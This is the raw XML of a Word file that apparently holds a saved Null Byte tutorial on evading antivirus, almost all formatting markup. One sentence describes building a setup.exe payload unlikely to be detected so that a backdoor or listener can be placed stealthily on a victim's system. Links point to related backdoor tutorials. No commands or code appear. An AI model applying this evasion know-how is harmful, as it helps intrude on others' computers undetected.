            <wp:docPr id="1" name="Picture 1" descr="https://img.wonderhowto.com/img/62/74/63493952592270/0/hack-like-pro-bypass-antivirus-software-by-disguising-exploits-signatur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62/74/63493952592270/0/hack-like-pro-bypass-antivirus-software-by-disguising-exploits-signature.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9048" cy="4361688"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>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 xml:space="preserve">We have now created an executable file by using the </w:t>
      </w:r>
      <w:r w:rsidRPr="008D49D0">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Times New Roman" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>X</w:t>
      </w:r>
      <w:r w:rsidRPr="008D49D0">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Times New Roman" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> option and then sent this file to the current folder and named the file </w:t>
      </w:r>
      <w:r w:rsidRPr="008D49D0">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Times New Roman" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>setup.exe</w:t>
      </w:r>
      <w:r w:rsidRPr="008D49D0">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Times New Roman" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>. We can now use this new payload in a client-side attack and the victim's AV software will be unlikely to have a signature for it, allowing us to stealthily place this backdoor/listener on their system.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004E268C" w:rsidRPr="008D49D0" w:rsidRDefault="004E268C" w:rsidP="008D49D0">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="0" w:name="_GoBack"/>
      <w:bookmarkEnd w:id="0"/>
    </w:p>
    <w:sectPr w:rsidR="004E268C" w:rsidRPr="008D4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B5377"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="7512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713"/>
    <w:rsid w:val="001B5713"/>
    <w:rsid w:val="004E268C"/>
    <w:rsid w:val="008D4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27601-1622-420D-96B7-634EC8AA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49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49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49D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D49D0"/>
    <w:rPr>
      <w:color w:val="0000FF"/>
      <w:u w:val="single"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="series">
    <w:name w:val="series"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:rsid w:val="008D49D0"/>
  </w:style>
  <w:style w:type="character" w:styleId="Strong">
    <w:name w:val="Strong"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="22"/>
    <w:qFormat/>
    <w:rsid w:val="008D49D0"/>
    <w:rPr>
      <w:b/>
      <w:bCs/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="NormalWeb">
    <w:name w:val="Normal (Web)"/>
    <w:basedOn w:val="Normal"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="008D49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49D0"/>
    <w:rPr>
      <w:i/>
      <w:iCs/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="margin-label">
    <w:name w:val="margin-label"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:rsid w:val="008D4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1500">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
      <w:divsChild>
        <w:div w:id="2086410578">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
          <w:divsChild>
            <w:div w:id="1313868080">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
              <w:divsChild>
                <w:div w:id="1831479871">
                  <w:marLeft w:val="0"/>
                  <w:marRight w:val="0"/>
                  <w:marTop w:val="0"/>
                  <w:marBottom w:val="0"/>
                  <w:divBdr>
                    <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                    <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                    <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                    <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                  </w:divBdr>
                  <w:divsChild>
                    <w:div w:id="1437826907">
                      <w:marLeft w:val="0"/>
                      <w:marRight w:val="0"/>
                      <w:marTop w:val="0"/>
                      <w:marBottom w:val="0"/>
                      <w:divBdr>
                        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                      </w:divBdr>
                      <w:divsChild>
                        <w:div w:id="669794060">
                          <w:marLeft w:val="0"/>
                          <w:marRight w:val="0"/>
                          <w:marTop w:val="0"/>
                          <w:marBottom w:val="0"/>
                          <w:divBdr>
                            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                          </w:divBdr>
                          <w:divsChild>
                            <w:div w:id="477499798">
                              <w:marLeft w:val="0"/>
                              <w:marRight w:val="0"/>
                              <w:marTop w:val="0"/>
                              <w:marBottom w:val="0"/>
                              <w:divBdr>
                                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                              </w:divBdr>
                              <w:divsChild>
                                <w:div w:id="1947690217">
                                  <w:marLeft w:val="0"/>
                                  <w:marRight w:val="0"/>
                                  <w:marTop w:val="0"/>
                                  <w:marBottom w:val="0"/>
                                  <w:divBdr>
                                    <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                                    <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                                    <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                                    <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                                  </w:divBdr>
                                  <w:divsChild>
                                    <w:div w:id="1161310264">
                                      <w:marLeft w:val="0"/>
                                      <w:marRight w:val="0"/>
                                      <w:marTop w:val="0"/>
                                      <w:marBottom w:val="0"/>
                                      <w:divBdr>
                                        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                                        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                                        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                                        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                                      </w:divBdr>
                                    </w:div>
                                  </w:divsChild>
                                </w:div>
                                <w:div w:id="1788155367">
                                  <w:marLeft w:val="0"/>
                                  <w:marRight w:val="0"/>
                                  <w:marTop w:val="0"/>
                                  <w:marBottom w:val="0"/>
                                  <w:divBdr>
                                    <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                                    <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                                    <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                                    <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                                  </w:divBdr>
                                  <w:divsChild>
                                    <w:div w:id="1761752340">
                                      <w:marLeft w:val="0"/>
                                      <w:marRight w:val="0"/>
                                      <w:marTop w:val="0"/>
                                      <w:marBottom w:val="0"/>
                                      <w:divBdr>
                                        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                                        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                                        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                                        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                                      </w:divBdr>
                                    </w:div>
                                  </w:divsChild>
                                </w:div>
                                <w:div w:id="1527521930">
                                  <w:marLeft w:val="0"/>
                                  <w:marRight w:val="0"/>
                                  <w:marTop w:val="0"/>
                                  <w:marBottom w:val="0"/>
                                  <w:divBdr>
                                    <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                                    <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                                    <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                                    <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                                  </w:divBdr>
                                  <w:divsChild>
                                    <w:div w:id="15228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like-pro-getting-started-with-metasploit-0134442/" TargetMode="External"/><Relationship Id="rId13" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://img.wonderhowto.com/img/original/62/74/63493952592270/0/634939525922706274.jpg" TargetMode="External"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/settings" Target="settings.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://null-byte.wonderhowto.com/how-to/hack-like-pro-embed-backdoor-connection-innocent-looking-pdf-0140942/"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ull-byte.wonderhowto.com/how-to/hack-like-pro-exploit-ms-word-embed-listener-your-roommates-computer-0140868/" TargetMode="External"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://img.wonderhowto.com/img/original/60/90/63493952581818/0/634939525818186090.jpg" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://creator.wonderhowto.com/occupythewebotw/"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img.wonderhowto.com/img/original/18/56/63493952568496/0/634939525684961856.jpg"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2019-03-15T05:17:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2019-03-15T05:20:00Z</dcterms:modified>
</cp:coreProperties>
</file>